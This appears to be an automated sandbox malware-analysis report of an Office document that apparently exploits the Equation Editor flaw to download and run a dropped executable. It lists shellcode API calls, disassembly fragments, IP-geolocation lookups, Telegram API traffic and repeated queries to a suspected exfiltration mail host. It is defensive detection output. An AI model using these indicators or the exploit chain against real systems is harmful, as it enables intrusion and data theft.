Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 66.63.187.123 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe			Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Potential downloader shellcode found

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,

2_2_002ACB15

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACB15 LoadLibraryW,URLDownloadToFileW,CreateProcessW,ExitProcess,	2_2_002ACB15
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACB9C URLDownloadToFileW,CreateProcessW,ExitProcess,	2_2_002ACB9C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACBD6 CreateProcessW,ExitProcess,	2_2_002ACBD6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACC0F ExitProcess,	2_2_002ACC0F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACA56 ExitProcess,	2_2_002ACA56
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACA8B URLDownloadToFileW,CreateProcessW,ExitProcess,	2_2_002ACA8B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACB2F URLDownloadToFileW,CreateProcessW,ExitProcess,	2_2_002ACB2F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_002ACBB5 CreateProcessW,ExitProcess,	2_2_002ACBB5

Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0023E8C5h	5_2_0023E478
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0023E8C5h	5_2_0023DE2C
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0023E8C5h	5_2_0023DF4A
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_002569B8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00259743h	8_2_00259330
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0025767Dh	8_2_00257490
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00258007h	8_2_00257490
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00259181h	8_2_00258EC4
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0025EB89h	8_2_0025E8A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_002571C9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0025F4B9h	8_2_0025F1D9
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0025FDE9h	8_2_0025FB08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0025F021h	8_2_0025ED40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0025F951h	8_2_0025F670
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00259743h	8_2_00259672
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_00256FEA
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F85AAh	8_2_005F82B0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F4321h	8_2_005F4050
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FE54Ah	8_2_005FE250
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F5A19h	8_2_005F5748
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FBA42h	8_2_005FB748
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F0311h	8_2_005F0040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F7111h	8_2_005F6E40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F8F3Ah	8_2_005F8C40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F6349h	8_2_005F6078
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F8A72h	8_2_005F8778
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F0C41h	8_2_005F0970
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F7A41h	8_2_005F7770
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FF86Ah	8_2_005FF570
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F2339h	8_2_005F2068
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FCD62h	8_2_005FCA68
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F3A09h	8_2_005F3760
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FA25Ah	8_2_005F9F60
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F50E9h	8_2_005F4E18
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FEA12h	8_2_005FE718
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F67E2h	8_2_005F6510
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FBF0Ah	8_2_005FBC10
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F10D9h	8_2_005F0E08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F7F7Ah	8_2_005F7C08
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F9402h	8_2_005F9108
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F27D1h	8_2_005F2500
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F1A09h	8_2_005F1738
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FFD32h	8_2_005FFA38
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F3101h	8_2_005F2E30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FD22Ah	8_2_005FCF30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FA722h	8_2_005FA428
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F07A9h	8_2_005F04D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F75A9h	8_2_005F72D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FC3D2h	8_2_005FC0D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F1EA1h	8_2_005F1BD0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F98CAh	8_2_005F95D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F3599h	8_2_005F32C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FDBBAh	8_2_005FD8C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FD6F2h	8_2_005FD3F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FABEAh	8_2_005FA8F0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F47B9h	8_2_005F44E8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F5EB1h	8_2_005F5BE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FEEDAh	8_2_005FEBE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F2C69h	8_2_005F2998
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F9D92h	8_2_005F9A98
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FE082h	8_2_005FDD88
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F4C51h	8_2_005F4980
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FB57Ah	8_2_005FB280
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F3E89h	8_2_005F3BB8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FB0B2h	8_2_005FADB8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F5581h	8_2_005F52B0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F6C79h	8_2_005F69A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FF3A2h	8_2_005FF0A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005F1571h	8_2_005F12A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 005FC89Ah	8_2_005FC5A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0061033Ah	8_2_00610040
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00611B22h	8_2_00611828
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0061330Ah	8_2_00613010
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00611FEAh	8_2_00611CF0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006137D2h	8_2_006134D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0061297Ah	8_2_00612680
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00611192h	8_2_00610E98
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0061165Ah	8_2_00611360
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00612E42h	8_2_00612B48
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00610802h	8_2_00610508
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00610CCAh	8_2_006109D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00613C9Ah	8_2_006139A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006124B3h	8_2_006121B8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067AD11h	8_2_0067AA68
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067BA19h	8_2_0067B770
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00673319h	8_2_00673070
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00674021h	8_2_00673D78
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067C721h	8_2_0067C478
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067EC49h	8_2_0067E978
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067FA11h	8_2_0067F740
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00676FE9h	8_2_00676D40
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00677CF1h	8_2_00677A48
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006789F9h	8_2_00678750
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00679701h	8_2_00679458
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067C2C9h	8_2_0067C020
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00673BC9h	8_2_00673920
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067CFD1h	8_2_0067CD28
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006748D1h	8_2_00674628
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006755D9h	8_2_00675330
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067DCD9h	8_2_0067DA30
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006762E1h	8_2_00676038
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006792A9h	8_2_00679000
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067F0E1h	8_2_0067EE10
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067B5C1h	8_2_0067B318
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00675E89h	8_2_00675BE0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067E7B1h	8_2_0067E4E0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00676B91h	8_2_006768E8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00677899h	8_2_006775F0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006785A1h	8_2_006782F8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067B169h	8_2_0067AEC0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067BE71h	8_2_0067BBC8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00673771h	8_2_006734C8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067CB7Bh	8_2_0067C8D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00674479h	8_2_006741D0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00675181h	8_2_00674ED8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067D881h	8_2_0067D5D8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00678149h	8_2_00677EA0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067F579h	8_2_0067F2A8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00678E51h	8_2_00678BA8
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00679B59h	8_2_006798B0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067D429h	8_2_0067D180
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00674D29h	8_2_00674A80
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00675A31h	8_2_00675788
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 0067E1C5h	8_2_0067DE88
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00676739h	8_2_00676490
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 00677441h	8_2_00677198
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006EC5E5h	8_2_006EC431
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006E5F38
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	8_2_006E7318
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006EB5C1
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then mov ecx, 000003E8h	8_2_006E75A0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006EBC6B
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006E2E16
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006E2AF4
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006EB8C2
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006EB8C0
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then push 00000000h	8_2_006EB17C
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then push 00000000h	8_2_006EC12E
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006EC12E
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006E5F28
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then jmp 006EC5E5h	8_2_006EC535
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then push 00000000h	8_2_006E950F
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006E2B00
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	8_2_006E7315
Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	8_2_006EC3A1

Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: checkip.dyndns.org
Source: global traffic	DNS query: name: reallyfreegeoip.org
Source: global traffic	DNS query: name: api.telegram.org
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online
Source: global traffic	DNS query: name: mail.jhxkgroup.online

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 66.63.187.123:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 132.226.247.73:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 132.226.8.169:80
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 158.101.44.242:80
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
